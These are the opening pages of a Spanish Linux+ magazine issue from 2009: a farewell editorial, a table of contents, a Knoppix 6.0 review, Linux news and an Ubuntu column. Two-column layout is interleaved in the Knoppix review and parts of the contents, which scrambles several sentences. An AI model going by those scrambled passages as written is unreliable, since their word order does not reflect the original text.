a modo de introducción

¡Qué excitante es la vida!

¡Qué excitante es la vida!

E
l despertador sonó a las seis y veinte igual que todos los días
de trabajo. Lo primero que pensé era: ¿y si duermo unos diez
minutos más? Y, como siempre, me quedé en la cama hasta
las siete. Sólo después de tomar una ducha era capaz de abrir
los ojos (es decir, levantar los párpados de manera que vea el mundo).
Y de repente, a pesar de sentirme extremadamente cansada y sin ganas de
salir de casa, a pesar de tener solo diez minutos para arreglarme y preparar
el desayuno, me paré un momento y pensé, sin darme cuenta: ¡Qué exci-
tante es la vida! Y volví a prepararme para salir pensando sobre todo lo
que tenía que hacer durante las próximas diez u once horas.
Ese momento, un segundo apenas, no me lo pude sacar de la cabeza
durante varias semanas. Sí, la vida es excitante. Lleva muchas sorpre-
sas, nos enfrenta cada día a situaciones difíciles, nos hace tomar deci-
siones que a primera vista parecen malas (o aun dañinas) para nosotros
o nuestros colaboradores, amigos y familia, pero después de poco tiem-
po resultan acertadas y provechosas.
La vida lleva muchas contradicciones de este tipo. Lo malo resulta
bueno y al revés. Las personas que son extremadamente idealistas, con

Sí, la vida es excitante. Lleva muchas

sorpresas, nos enfrenta cada día a situaciones
difíciles, nos hace tomar decisiones que
a primera vista parecen malas
un modo de pensar que no comparten con el resto del mundo, no pocas
veces resultan ser geniales inventores o proveedores de nuevas teorías
que revolucionarán el mundo.
Una contradicción más es que el fin significa, sobretodo, un co-
mienzo. Acabar una aventura es empezar otra. Todo depende de nuestro
punto de vista o, en otras palabras, de cómo queremos ver las cosas.
Tras esta introducción muy larga he llegado a lo que quería deciros:
se acaba mi aventura con LiNUX+. Es la última vez que me dirijo a vo-
sotros y espero que el último año lo hayamos pasado muy bien juntos.
Quería agradeceros cada correo, teléfono, sugerencia y crítica. He apren-
dido mucho de vosotros, espero que vosotros hayáis aprendido algo de la
revista. Pero, según lo escrito antes, este fin empieza una nueva aventura
en mi vida. Lo que deseo para mí misma es que sea por lo menos tan
exitosa como mi trabajo para LiNUX+. El número que tenéis en manos
es sobre gráfica y diseño web. Temas no muy linuxeros pero muy actuales
y de moda. En la sección principal os proponemos dos artículos interesan-
tísimos. Uno, escrito por Yaiza Temprado Rodríguez, es sobre personali-
zación de Google Maps. Si vuestros amigos o clientes tienen problemas
de localizar vuestra oficina o empresa, este artículo está dedicado en pri-
mer lugar a vosotros. El otro, escrito por José María Gómez Hidalgo, se
situa al borde entre un artículo sobre diseño web y seguridad. Ya veréis.
Después de recibir muchos emails pidiéndonos textos sobre hac-
king, hemos desarrollado esta sección notoriamente. El resto de las
secciones no las voy a describir. ¡Qué sean una sorpresa!
Una vez más quiero agradeceros vuestra colaboración y paciencia
en leer estos editoriales. Y, sobre todo, desearos mucha suerte. Os veo
en mayo, aunque ya solo como lectora de la revista.
Aleksandra Tęsiorowska
Redactora de LiNUX+

www.lpmagazine.org 3
 índice

En este número

descripción de DVD software

6 Knoppix 6.0
Hector Colina
28 Debian Lenny 5.0: La última versión
estable del sistema operativo libre
Leonel Iván Saafigueroa
Gracias a veintidós meses de desarrollo constante, y luego de postergar
novedades la fecha de lanzamiento varias veces, apareció una nueva versión estable
del sistema operativo libre por excelencia.
8 Noticias
Equipo de Linux+

10 Ubuntu
Francisco Javier Carazo Gil

12 Fedora
Diego Rivero Montes

gráfica y diseño web

14 Cómo crear mapas con el API

de Google Maps e integrarlos en tu página web
Yaiza Temprado Rodríguez
La comodidad y flexibilidad de uso de los mapas de Google hacen que cada
vez más gente quiera poder integrarlos en sus páginas web, poder persona-
32 Desarrollo de sistemas complejos
Lino García Morales
lizarlos e interactuar con ellos. Sistemas complejos hace referencia a un, relativamente nuevo, campo
de la ciencia multidisciplinar que estudia cómo las partes de un sistema
dan lugar a comportamientos globales del sistema en interacción con su
entorno.

entrevista

36 SYS4NET:
Hosting de calidad máxima
SYS4NET es una companía dedicada a los servicios de alojamiento web
y registro de dominios, con infraestructura propia en España, en la que
aloja más de 20.000 páginas web.

22 Privacidad en Flickr
José María Gómez Hidalgo
Las redes sociales han convertido a la Web en un entorno realmente inte-
ractivo y social para todos sus usuarios. Hoy en día, cualquiera puede crear
contenidos en la Web, y compartirlos con todos sus conocidos.

hacking para linuxeros

38 Geolocalización IP
David Puente Castro
Localizar una IP a lo largo del globo terráqueo para saber en que país,
ciudad, región, latitud o longitud se encuentra alguien con el que chatea-
mos y desconocemos su paradero, no pasa de ser un mero juguete que
puede resultar divertido. Pero cuando se implementa dentro del código
de nuestro propio traceroute, entonces se convierte en un arma mucho
más poderosa.

4 Linux+ 4/2009
 índice

Tema del número gráfica y diseño web

46 Ataques Man In The Middle: linux en la empresa

Su información en manos enemigas
David Puente Castro
Su información viaja a diario de un ordenador a otro. Está ciertamente
acostumbrado a confiar en que llegará siempre a su destino. Pero... ¿se
ha preguntado alguna vez si alguno de estos ordenadores intermedia-
rios puede estar controlando todo su tráfico en busca de información
sensible?
64 Software Libre, desde el aula a la empresa
Juan Pablo Tobar
Hoy en día por cada área de administración de empresas existe una
amplia oferta de aplicaciones destinadas a mejorar la productividad de
los profesionales a cargo. Sin embargo, la integración de software en la
gestión no es sólo de interés de las empresas, también lo es de las organi-
zaciones encargadas de preparar a los futuros profesionales del área.

54 Proyecto Metasploit programación

David Puente Castro
Metasploit es un proyecto libre que ha sido diseñado con el objetivo de
proveer una plataforma de trabajo a los desearrolladores de herramientas
de seguridad y exploits. Es una estructura modularizada que permite
una rápida elaboración de programas de ataque y análisis de vulnera-
bilidades.
72 Programando nuestro propio Editor de Texto
Jorge Emanuel Capurro
En esta entrega, veremos las facilidades que nos provee Gambas para
desarrollar un sencillo Editor de Texto. Para ello, daremos una recorrida
sobre los fundamentos del lenguaje BASIC y sus estructuras, pasando
también por el manejo de archivos de disco.

conocimiento libre

60 La polémica del año: práctica

Extensión del Copyright en Europa
José Carlos Cortizo Pérez
El parlamento europeo debate sobre la posible ampliación de los dere-
chos del copyright, que pasaría de una duración de 70 años a 95, benefi-
ciando mayoritariamente a las discográficas que, gracias a las cláusulas
abusivas que hacen firmar a los artistas, son quienes poseen los derechos
de las obras. Resulta paradójico que los políticos que deberían defender
el desarrollo cultural y el acceso a la misma, solo sean capaces de regirse
por los beneficios de unos pocos.
84 Spike Proxy
David Álvarez García
Spike Proxy forma parte de la suite SPIKE, un proxy para el pro-
tocolo Http / Https de código abierto usado para analizar las apli-
caciones web que nos interesen y su comunicación con los clientes
(navegadores); aplicación muy útil para desarrolladores y para entu-
siastas de la seguridad.

www.lpmagazine.org 5
 descripción de DVD
DVD
Knoppix 6.0
E
n marzo del 2008, salía a la luz pú-
blica la última versión que se co-
nocía de Knoppix, la versión 5.3.1;
desde ese entonces ha transcurrido
casi un año para que una nueva versión saliese
a la luz pública: Knoppix 6.0.
Knoppix 6.0 puede ser considerado como
un cambio de paradigma en cuanto a sus suce-
sores en función de que Klaus Knopper ha dado
un vuelo a muchos componentes, desde el ma-
nejador de escritorios, hasta el sistema base.
Sistema Base
En principio, la base de Knoppix 6.0 es debian,
por lo cual aprovecha gran parte de las aplica-
ciones empaquetadas para debian; por ejem-
plo, el archivo de configuración para la des-
carga de archivos luce de la manera presentada
en el Listado 1. Es interesante notar que Klaus
utiliza Alioth, plataforma de la comunidad de
Debian para desarrollos que está al servicio de
la comunidad GNU.
Aspecto Gráfico
Knoppix 6.0 trae como escritorio LXDE, acró-
nimo de Lightweight X11 Desktop Environment,
en su versión 0.3.2.1, ambiente de escritorio
diseñado con el propósito de ser muy rápido,
ligero y que consuma pocos recursos; LXDE
ha sido empaquetado para las distribuciones de
Linux más importantes, tales como ArchLinux,
Debian, Fedora, Gentoo, Mandriva, Ubuntu,
Xandros, SuSE, Slackware y otras más.
Este cambio puede desorientar a muchos
usuarios que estaban acostumbrados a trabajar
Figura 1. Iceweasel 3.0.5 con el plugin noscript activo por defecto
6 Linux+ 4/2009
Listado 1. Contenido del archivo /etc/apt/sources.list de Knoppix 6.0
knoppix@Microknoppix:/etc$ cat apt/sources.list
deb http://ftp.de.debian.org/debian experimental main contrib non-free
deb http://ftp.de.debian.org/debian unstable main contrib non-free
deb http://security.debian.org lenny/updates main contrib non-free
deb http://ftp.de.debian.org/debian lenny main contrib non-free
deb http://ftp.de.debian.org/debian stable main contrib non-free
deb http://security.debian.org stable/updates main contrib non-free
# Knoppix repository
deb http://debian-knoppix.alioth.debian.org ./
con KDE en Knoppix, no obstante pensamos necesario actualizar las fuentes con aptitude
que Klaus Knopper realizó una jugada en update, luego de la actualización estará dispo-
función de que Knoppix pudiese funcionar en nible openoffice.org-l10n-es.
equipos de bajo poder cómputo.
Navegación
Aplicaciones Para navegar en Internet, Knoppix 6.0, trae in-
LXDE incluye PCMan File Manager 0.5 como corporado Iceweasel 3.0.5 con el plugin nos-
manejador de archivos, aplicación bastante rá- cript activado (ver Figura 1) por defecto y para
pida que cumple el cometido de permitir exa- los que necesitan navegar en consola en algún
minar, mover, cortar, copiar o visualizar archi- momento, el paquete www-browser.
vos graficos.
En cuanto a ofimática, se incluye Open- Accesorios
Office.org en su versión 3.0.1, con lo cual Knoppix 6.0 trae incorporado un lector cd pdf,
cualquier usuario de Knoppix tendrá en sus un editor de textos sencillos (leafpad), gnokii
manos una estación de trabajo con una de las para sincronizar teléfonos celulares.
mejores suites ofimáticas del mundo del soft-
ware libre, no obstante, un primer problema Accesibilidad
con el cual los usuarios hispanohablantes nos Knoppix 6.0 está pensado, es nuestra impre-
podemos encontrar es que esta herramienta está sión, mayormente para usuarios con problemas
en inglés y que para poder instalar los paquetes de accesibilidad, destacándose A.D.R.I.A.N.E.
necesarios para que se configure en español, es (Audio Desktop Reference Implementation And
Networking Environment) una herramienta que
integra lo mejor del mundo GNU en esta mate-
ria, lector de menús, sintetizador de voz, mag-
nificador de pantallas y otros más; así mismo,
ADRIANE soporta dispositivos braille, tal vez
porque Klaus Knopper quizo desarrollar una
herramienta poderosa para su esposa Adrian-
ne (que posee debilidades visuales) y todas
aquellas personas que poseen discapacidades
visuales.
Recomendaciones
A continuación algunas recomendaciones que
se podrán utilizar a la hora de instalar Kno-
ppix 6.0:
• Por defecto, el sistema inicia A.D.R.I.A.
N.E., por lo cual sólo aparecerá un menú
con las opciones de Knoppix para que per-
sonas con discapacidades puedan utilizarlo
de manera más sencilla (ver Figura 2).
 descripción de DVD
DVD

• Si desea convertirse en root, con escri-

bir sudo -s es suficiente.
• Si decide instalar el sistema, actualize los
fuentes con aptitude update, lo cual
le dará una mayor cantidad de paquetes
disponibles.
• Aun no está traducida en su totalidad al
español, por lo cual deberá usar paquetes
de debian nativos instalándolos con ap-
titude o con el gestor gráfico que posee
Knoppix.

Conclusiones
Quizás para los usuarios acostumbrados
a otras versiones de Knoppix, la 6.0 les parezca
un retroceso en cuanto a interfaz gráfica,
Figura 2. A.D.R.I.A.N.E
cantidad de paquetes disponibles y otros. No
obstante, es indudable el aporte que Knoppix Nota: Las pruebas de esta distribución fue-
6.0 da a todas aquellas personas que poseen ron realizadas en una portátil Asus PRO52RL,
Sobre el autor problemas de accesibilidad y que hasta hoy con procesador Duo T2330 de 1,60 Ghz, 2Gb
no tenían una distribución de Linux enfocada de RAM sobre una máquina virtual virtualbox
Hector Colina, evangelista del software lib-
en sus necesidades. 2.1.2, funcionando sobre Debian Lenny con
re con más de 12 años de experiencia en
Otro punto importante a considerar es lo kernel personalizado 2.6.28.
GNU, investigador en procesos de aprop
ligero de Knoppix 6.0 lo cual lo hace ideal para
iación y transferencia tecnológicas, obtuvo
instalar en portátiles mini, que abundan hoy día
una licenciatura en Teoría Histórica, vive
y que con el correo del tiempo han disminuido
en Mérida, Venezuela y es activo colabo-
rador en la comunidad de Debian y en los
enormemente el precio, quizás ésta haya sido En la red
una de las inspiraciones de Klaus Knopper al
grupos de usuarios de su país. • http://www.lxde.org/
reescribir Knoppix.

PUBLICIDAD

www.lpmagazine.org 7
NE WS
novedades
Noticias
2010: ¿El 70% de ordenadores en Asia
y América Latina con GNU/Linux?
María Dolores Gallego, Salvador Bueno
(Universidad Pablo de Olavide) y Paula
Luna (Universidad de Sevilla) elaboraron
un estudio sobre el uso del Software Libre
para la revista Technological Forecasting
& Social Change. Las conclusiones del
informe son bastante sorprendentes: supo-
nen que para 2010 la adopción de software
libre en América del Sur y Asia se situará
próximo al 70%, destacando especialmente
la implantación en el sector educativo.
Como escribe Cibersur.com, en el trabajo,
cuya finalidad ha sido medir el creciente
interés hacia el software libre, se aúnan
las opiniones de 18 expertos en la materia,
tanto del ámbito académico como profesio-
nal, valiéndose del método Delphi. A través
de esta herramienta, diseñada para obtener
el consenso de opinión más fidedigno entre
miembros de un grupo, se sometió a los
expertos a dos rondas de preguntas.
Fuente: http://www.cibersur.com/modules.p
hp?name=News&file=article&sid=12344
&theme=Cibersur&ref=63
Cuba apoya plenamente
los proyectos de Software Libre
En febrero tuvo lugar la Feria de Informática
en La Habana, Cuba. Se presentó entonces
Nova, un nuevo sistema basado en Linux co-
mo parte de la apuesta oficial por el software
libre y su defensa de la soberanía informática
en la isla.
Nova fue creado por estudiantes y profesores
de la Universidad de las Ciencias Informáti-
cas de La Habana (UCI) y su misión es faci-
litar el proceso de migración del Windows al
software libre que comenzó el país en 2005.
Angel Goñi, líder del proyecto, explica que
el sistema permite utilizar aplicaciones mo-
dernas en una interfaz sencilla y trabajar con
las máquinas obsoletas que todavía abundan
en la isla. Cuba, por el bloqueo (estadouni-
dense) y toda la situación económica, todavía
tiene en funcionamiento computadoras que
en otros lugares del mundo son basura.
Se estima que un 20% de máquinas cubanas
trabajan bajo Linux, pero, según un estudio
oficial, dentro de unos años este número
aumentará a un 50%.
Fuente: Anett Ríos, http://
www.ultimahora.com/notas/195762-Cuba-se-
lanza-de-lleno-al-mundo-del-software-libre
1234567890
El viernes, 13 de febrero de 2009, el reloj de
Unix llegó al especial número 1234567890.
Como explica DiarioTI, todos los sistemas
Unix y derivados están provistos de un reloj
interno que cuenta el número de segundos
desde la medianoche del primero de enero de
1970, UTC (Coordinated Universal Time). El
sistema es denominado Unix Time o POSIX-
Time. La hora 1234567890 se celebró alrede-
dor del mundo el 13 y el 14 de Febrero.
Fuente: http://www.diarioti.com/gate/
n.php?id=21218
8 Linux+ 4/2009
Tecnología abierta
para la siguiente generación de redes
A
l margen de las telecomunicaciones,
existen muy pocas industrias donde el pre-
cio haya tenido cambios tan dramáticos desde la
concepción del plan de negocio que dio origen a
las empresas hasta la situación real del mercado.
Además, los operadores de telecomunicaciones
han de ir varios pasos por delante de sus clientes
en la construcción de sus redes, como requisito
imprescindible para poder satisfacer la demanda
de servicios. Y las decisiones tecnológicas, que
para un usuario de empresa siempre tienen
cierto riesgo, en el caso de los proveedores de
telecomunicaciones marcan la diferencia entre
ser viable o no.
Una de las decisiones más importantes que
ha de tomar un operador es elegir bien a sus
proveedores tecnológicos. Cuanto más complejo
es el servicio que quiere prestar, mayores posibi-
lidades existen de que ningún fabricante pueda
proporcionar la solución técnica en su totalidad.
Normalmente se especializan en un campo con-
creto y, aunque intentan complementar su oferta,
siempre hay quien hace mejor determinada tarea.
Si se necesita garantizar la interoperabilidad en-
tre equipos y sistemas diferentes y además se re-
quieren sistemas de gestión y soporte para la so-
lución, entonces es imprescindible utilizar están-
dares abiertos.
Hace algunos años, Interoute decidió apostar
claramente por la voz sobre IP (VoIP). En estos
momentos parece una decisión lógica, a la vista
de que la inmensa mayoría de los fabricantes de
centrales de conmutación utilizan IP internamen-
te y todos sus desarrollos van por ese camino
y las ventajas que aporta esta tecnología son muy
atractivas. Pero hace unos años no estaba tan cla-
ro que una plataforma VoIP pudiese crecer para
mantener el brutal tráfico de voz que un operador
necesita. Esta plataforma cursa hoy 100 millones
de minutos de voz por mes y, en su arquitectura,
ha sido imprescindible utilizar estándares abier-
tos como SIP, docenas de servidores Linux y la
conexión de múltiples centrales de conmutación
y pasarelas de acceso mediante una red IP MPLS
que cubre 54.000 kilómetros de fibra en Europa.
Las Redes de Siguiente Generación (NGN,
Next Generation Networks) que han entrado en
funcionamiento en los últimos años llegan a un
mercado que, a nivel de infraestructuras, se llegó
a decir que rozaba la saturación. Sin embargo,
aportan un elemento clave para la competitivi-
dad: la inteligencia.
Sobre estas redes inteligentes se han des-
plegado aplicaciones novedosas, interactivas,
fiables y disponibles en tiempo real. En este
escenario, las empresas tienen a su alcance una
completa oferta de servicios que pueden alqui-
lar y pagar por uso, lo que les aporta enormes
ventajas económicas, operativas y tecnológicas,
particularmente en época de crisis. Basta con una
conexión IP para acceder a tecnologías de última
generación en cualquier momento y lugar.
Gracias al crecimiento del ancho de banda
y a los ahorros en equipos que propicia tal esque-
ma, podemos esperar una rápida expansión de es-
te modelo de negocio. Las empresas asumen cada
vez más las ventajas de centrarse en su negocio
y encomendar la gestión de redes y servicios
asimilados a compañías experimentadas, que
comprometen niveles de calidad y fiabilidad por
contrato. De hecho, ya se aprecia cierto resurgir
de los ASPs en áreas como la telefonía IP o servi-
cios verticales. Estamos en la era de la movilidad
y la convergencia, con la vista puesta en acceder
a cualquier contenido, desde cualquier lugar
y con cualquier dispositivo. Los servicios se des-
ligan de los activos físicos a los que han estado
unidos durante décadas y se rompen las barreras
que impedían la convergencia de sistemas fijos
y móviles, Wi-Fi y GSM, voz y datos,… Todo es
convergente, más móvil y más flexible. La infor-
mación está en la red, no en un equipo concreto.
La virtualización se traslada al mundo de
las telecomunicaciones, donde las nuevas redes
ya están preparadas para compartir plataformas
y recursos entre muchos usuarios. En Interoute
llevamos varios años trabajando en ello.
La abstracción de recursos está ahora más
cerca de los usuarios en forma de servicios ges-
tionados y afecta a más ámbitos de las TIC. Me-
nor o nula cantidad de máquinas en las instalacio-
nes del usuario y más servicios que residen en la
Red, para que los recursos estén disponibles en
cualquier momento y lugar. Se trata de una orien-
tación a los servicios –el mercado de software de
virtualización crece desde los 560 millones de
dólares de 2005 a 1.800 millones en 2009.
Los sistemas que constituyen las redes cada
vez incluyen hardware más programable. El
software gana en importancia, incluso a nivel de
circuitos integrados y PICs (Photonic Integrated
Circuits). Mediante herramientas de virtualiza-
ción y partición, las empresas pueden disponer de
recursos escalables según sus necesidades. De
nuevo hablamos de sistemas y estándares abiertos.
José Manuel Armada
Director de Ingeniería de Clientes,
Interoute Iberia

Los tiempos están cambiando
D icen que los tiempos están cambiando,
y se lleva oyendo desde que el mundo
es mundo. Sin embargo, en algunas áreas los
tiempos YA han cambiado. En lo que se re-
fiera a los sistemas operativos en PC, cuando
Linux empezó a despuntar estaban cambian-
do los tiempos. Hoy, Linux no es un proyecto
de futuro, es presente.
Algo similar pasó hace unos años, cuan-
do los virus cambiaron de rumbo. En lugar
de ser código ejecutable puro y duro, las
amenazas informáticas empezaron a cambiar
y a dedicarse al robo de datos y al engaño.
Los tiempos están cambiando, decíamos
los profesionales de la seguridad en 2004,
2005, 2006… Y ya estamos en 2009. Seño-
res: los tiempos han cambiado. Hace tiempo
el tener Linux instalado era una garantía de
seguridad, mientras que hoy en día no lo es.
Los tiempos han cambiado.
Desde hace mucho tiempo he afirmado
que el mayor agujero de seguridad de un siste-
ma es el dedo índice del usuario. El dedo que
hace click en un enlace incorrecto, el dedo
que hace click en un Aceptar en lugar de Can-
celar. Y ese dedo lo va a hacer exactamente
igual en un maravilloso Ubuntu o en un Win-
dows 95 sin parchear.
La necesidad de un sistema de seguridad
siempre se ha entendido como un antivirus.
Posteriormente se añadió un cortafuegos, un
anti spam, un antinosequé… Y los usuarios
de Linux tan contentos con su cortafuegos.
Se basaban en unos conocimientos que hoy
en día no tienen los usuarios de Linux.
Entre todos los que podamos tener más
conocimientos de sistemas, debemos empe-
zar a derrocar las ideas instauradas como
inamovibles, que van a perjudicar a los nue-
vos usuarios de Linux.
Página de LiMo Foundation
En primer lugar: sí que existen virus para
Linux. Muy pocos, y, si el sistema está bien
parcheado y administrado, sin posibilidad de
propagación efectiva. Pero existen, y pueden
hacer daño. Los usuarios que no distingan la
cuenta root de guest, deben tener un antivi-
rus instalado en su sistema.
Seguimos: los ataques a Linux son tan fre-
cuentas como en Windows. Sí, lo son, que nadie
se eche las manos a la cabeza: Linux necesita
un cortafuegos, al igual que lo necesita cualquier
sistema conectado a Internet. En la práctica tota-
lidad de las distribuciones hay uno incluido,
así que basta con tenerlo en marcha.
El spam: el spam no es un tema de un deter-
minado sistema operativo. Todo aquel que tenga
una cuenta de correo electrónico, tarde o tem-
prano recibirá spam en su Mac, en su WinPC
o en su OS/2, me da exactamente lo mismo. Si
no se quiere tener un buzón lleno de ofertas de
viagra, hay que instalar un sistema antispam.
Y por último: existen soluciones que
aúnan todas esas protecciones en una aplica-
ción. Sé que muchos usuarios no quieren ni
oír hablar de programas de este tipo, pero en
el mercado existen y son muy necesarios. So-
lamente la inconsciencia y el error de pensar
Linux es perfecto pueden llevar a la catástro-
fe a un usuario no experto.
Los tiempos están cambiando, y el cambio
debe llegar a todo el mundo. Hay que prote-
ger la información, y Linux no lo va a hacer
por arte de magia, sino porque tiene herramien-
tas que lo protegen adecuadamente. Usémoslas,
y lo más importante: hagamos que los usuarios
a los que tengamos que aconsejar las usen. Que
no pase como con las copias de seguridad, que
siempre se dice que es básico y… ¿cuándo fue
la última vez que hizo un backup de su sistema?
Ontinet.com
www.lpmagazine.org
NE WS
novedades
Noticias
Ubuntu deja de ser
una distribución hogareña
Ubuntu deja de ser una distribución
utilizada en hogares. Tampoco es una
distro que se utiliza en ordenadores
de sobremesa. Canonical realizó una
encuesta, gracias a la cual nos enteramos
de que la mayoría de las casi 7.000
empresas encuestadas están utilizando
Ubuntu Linux en trabajos de misión críti-
ca que normalmente se ejecutan en servi-
dores, como seguridad de correo electró-
nico, routing, clustering, virtualización,
backup de datos o bases de datos.
Ahora solo cabe preguntar: ¿Cuándo
Ubuntu sustituirá a Red Hat y se conver-
tirá en el líder de Linux para el mercado
empresarial?
Fuente: Rosalía Arroyo, http://
www.vnunet.es/es/vnunet/news/2009/02/
05/ubuntu_entra_en_las_corporaciones
JoliCloud, nueva distribución
diseñana para ultraportátiles
Tariq Krim, el ex CEO de Netvibes,
acaba de desarrollar una nueva distribu-
ción Linux para ultraportátiles, nombrada
JoliCloud. La distro trae una fuerte
integración con las aplicaciones cloud
computing. La interfaz ha sufrido de una
simplificación y orientación hacia la web
que mejora la experiencia del usuario,
además se ha logrado una reducción de
los tiempos de arranque.
Fuente: http://www.desarrolloweb.com/
actualidad/jolicloud-nueva-distribucion-
linux-para-netbooks-1402.html
En 2009 los operadores españoles
más grandes venderán móviles con Linux
Orange, Telefónica y Vodafone, entre
otras, han anunciado que en 2009 quieren
vender móviles con Linux. Todas ellas
pertenecen a LiMo, fundación de Linux
inalámbrica. Telefónica hará lo propio
y venderá terminales que compitan con
los sistemas operativos de Nokia, Apple,
Microsoft y Google. (...) En el mercado
hay algunos dispositivos que utilizan
LiMo y han sido fabricados por firmas
como NEC, Panasonic o Motorola.
Fuente: Manuel Moreno, http://
www.vnunet.es/es/vnunet/news/2009/02/
09/las_principales_operadoras_vende-
ran_moviles_con_linux_en_2009
EVE Online abandona Linux
Uno de los Multijugadores Masivos
de CCP, EVE Online, decidió abandonar
su versión para Linux. EVE online no
continuará ofreciendo soporte para la edi-
ción del juego compatible con Linux. Gra-
cias a esta decisión se mejorará la versión
para MAC, que fue lanzada en oviembre
de 2008.
Fuente: http://www.meristation.com/
v3/des_noticia.php?id=
cw499010452c02cπc=GEN
9
 novedades
Ubuntu sección llevada por Francisco Javier Carazo Gil ubuntu@lpmagazine.org
La distribución
más popular de 2008
Posiblemente muchos lo suponíais
ya, pero como siempre es bueno tener
datos para poder afirmarlo con mayor
seguridad y objetividad. Según el informe
que elabora cada año Distro Watch, portal
dedicado a todas las distribuciones de
GNU/Linux, BSD y Solaris; Ubuntu ha
sido la distribución más popular a lo largo
de 2008. Aunque hace ya algo de tiempo
que pasó esta fecha, nunca viene mal
recordar este tipo de noticias que al fin
y al cabo, suponen algo así como un
premio a la regularidad a lo largo de un
año. Para quienes no tengan claro la pro-
cedencia de los datos, deciros que aunque
posiblemente los de DistroWatch verdad
absoluta, sí son uno de los mejores
documentados que podemos encontrar
en la red. Un buen síntoma sin lugar
a dudas para una distribución que está
ya en fase de madurez y que sin embargo
sigue creando seguidores. La clasificación
final quedó así:
• Ubuntu,
• OpenSUSE,
• Linux Mint,
• Fedora,
• PCLinuxOS,
• Debian,
• Mandriva,
• DreamLinux,
• Sabayon,
• Damn Small Linux.
Ubuntu, también en las empresas
Desde la creación de Ubuntu Server, dos
de los objetivos principales de Canonical
eran hacer a Ubuntu rentable a través de los
ingresos que podía generarle esta división
de la distribución y por supuesto, buscarse
un hueco dentro de las grandes corporacio-
nes como algo más que una distribución
para equipos de escritorio. Aunque muchos
han criticado en algunas ocasiones, las
modificaciones que Canonical ha realizado
sobre el núcleo Linux, parece que la esta-
bilidad no se ha comprometido tanto como
algunos podían creer y a día de hoy, sí es
verdad que Ubuntu Server se ha convertido
en una alternativa real a otras distribuciones
clásicas en este campo, como Red Hat. Sin
embargo, todavía queda mucho para llegar
al nivel de la distribución del sombrero.
Ubuntu Mobile usará QT en lugar de Gnome
A diferencia de la versión para escritorio,
parece que Canonical se ha decantado por
el binomio QT/KDE para la versión de
Ubuntu destinada a dispositivos móviles.
La versión actual sí usa Gnome, pero debi-
do a problemas con el soporte de distintos
tamaños de pantalla y a que Nokia licencia-
rá QT bajo LGPL, la opción de QT parece
cada día más clara. Además, hay que tener
en cuenta el apoyo y las mejoras que pueda
aportar Nokia a QT en cuestiones propias
de movilidad.
10
UNR 9.04, Ubuntu oficial para miniportátiles
E xisten todavía muchos nombres para lla-
mar a esa familia de equipos portátiles
iniciada por Asus con su modelo Eee PC. El
término más utilizado a día de hoy es netbook
aunque existen otros como UMPC, miniportátil
o portátil ultracompacto. La verdad, es que el
nombre que termine estandarizándose de facto
en un futuro que supongo, será cercano, tendrá
otro nombre muy asociado a él: Linux. Y es que
para todos nosotros amantes en mayor o menor
medida de GNU/Linux, el nombre de nuestro
sistema operativo favorito siempre está relacio-
nado con los PCs, ya sean portátiles, ultraportá-
tiles o equipos de sobremesa. Sin embargo, para
la mayoría de usuarios de PCs que son usuarios
de toda la vida de Windows, será la primera vez
que hayan visto equipos en los centros comer-
ciales y tiendas especializadas a gran escala con
distintas distribuciones de GNU/Linux.
La verdad es que el mérito completo no es
sólo de las distribuciones en sí, sino del fracaso
de Microsoft con Windows Vista, un sistema
operativo incapaz de ejecutarse decentemente
en este tipo de equipos de reducidos precio
y dimensiones, y también reducida potencia hard-
ware en comparación con sus hermanos mayores.
Al final, como casi todos sabréis, Microsoft se ha
visto obligada a alargar la vida de su ya anciano
XP unos cuantos años más, para que esté dispo-
nible en este sector mientras sale a la luz el espe-
radísimo Windows 7. Se espera que Windows 7
mejore a Vista en todo y muy especialmente en
no ser un devorador de recursos hardware como
ningún otro sistema operativo de uso comercial
en toda la corta pero intensa vida de la compu-
tación.
Como en todas las áreas en las que se
especializan las distribuciones, ésta no podía
ser otra y desde el momento en que comenzó
a popularizarse este tipo de equipos, miembros
de la comunidad de Software Libre comenza-
ron a desarrollar distribuciones especializadas
para netbooks. Hablamos de distribuciones en
las que el interfaz gráfica está especialmente
adaptada a las pequeñas pantallas, de entre 7
y 11 pulgadas, y también el software que traen
incorporado está orientado a las funciones que
suelen cumplir estos equipos: navegación, co-
rreo electrónico, mensajería instantánea...
Como muchos de vosotros sabéis, la mayor
parte de las distribuciones nacen a partir de otra
distribución, que en muchos casos a su vez de-
riva de una tercera, y en ocasiones, incluso se pue-
de suceder esta cadena en más niveles. Ubuntu
es de hecho una distribución derivada de De-
Linux+ 4/2009
bian, pero una gran cantidad de distribuciones,
algunas creadas por la propia Canonical, están
derivadas a su vez de ella.
Existen varias distribuciones derivadas de
Ubuntu orientadas a este segmento, algunas más
concretamente orientadas al Asus Eee PC, como
Ubuntu Easy Peasy, el modelo que inauguró esta
idea. En realidad, funcionan sobre los demás mo-
delos y marcas, pero a priori, tienen un mejor so-
porte para este modelo en concreto, sobre todo en
cuestiones relativas al hardware y a la adaptación
del escritorio al entorno en que se muestra, las
pantallas reducidas de tamaño. Linux4one, está
también basado en Ubuntu pero está orientado al
modelo de Acer, Aspire One. Hemos hablado en
anteriores entregas de esta revista, en esta misma
sección, de algunas como por ejemplo Ubuntu
Easy Peasy u otras de las que no hemos hablado
pero que tienen ya su propia base de usuarios
y colaboradores como eeeXubuntu o Linux4one .
Como decíamos, Ubuntu tiene ya varias
distribuciones derivadas orientadas a este tipo
de equipos pero ninguna oficial. Sin embargo,
Canonical, la empresa matriz de Ubuntu ha de-
cidido crear una distribución, fomentada por la
propia empresa matriz, de nombre Ubuntu 9.04
Netbook Remix, que ocupará este sector con el
apoyo de la propia Canonical, al igual que ocurre
en sus respectivas áreas con Kubuntu, Xubuntu
o el CD educativo de Ubuntu.
Es de vital importancia este paso, puesto que
muchos fabricantes, eligen distribuciones que es-
tán soportadas por empresas de cierta relevancia
para que las incorporen por defectos sus equipos,
como es el caso de Linpus para el Acer Aspire
One. Ningún fabricante de hardware, se arriesga
a instalar por defecto con licencia OEM (aunque
gratuita) un sistema que está soportado por una
comunidad de usuarios sin tener una empresa
que la respalde. En el caso de las distribuciones
derivadas de Ubuntu hasta ahora, esto era lo que
pasaba, pero a partir de ahora posiblemente, gra-
cias a la fama y al renombre que está cogiendo ya
el nombre Ubuntu, esperemos que los fabricantes
empiecen a instalarla por defecto en sus equipos.
El hecho de que las empresas de hardware
puedan elegir a esta distribución como el sistema
operativo predefinido para las versiones con
GNU/Linux de sus equipos de bajo coste, es una
cantera más, de usuarios que a todos los usuarios
de las distintas versiones de Ubuntu en concreto
y de Linux en general, beneficiará. Por cierto, co-
mo habréis visto en el nombre de la distribución,
